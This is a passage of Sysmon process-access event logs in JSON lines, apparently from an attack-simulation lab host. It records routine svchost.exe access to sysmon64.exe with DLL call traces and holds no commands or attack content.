\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3882,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.894\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.894","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3883,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.894\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.894","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3884,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.894\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.894","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3885,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.894\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.894","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3886,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.894\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.894","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3887,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.894\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.894","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3888,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.894\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.894","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3889,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.894\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.894","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
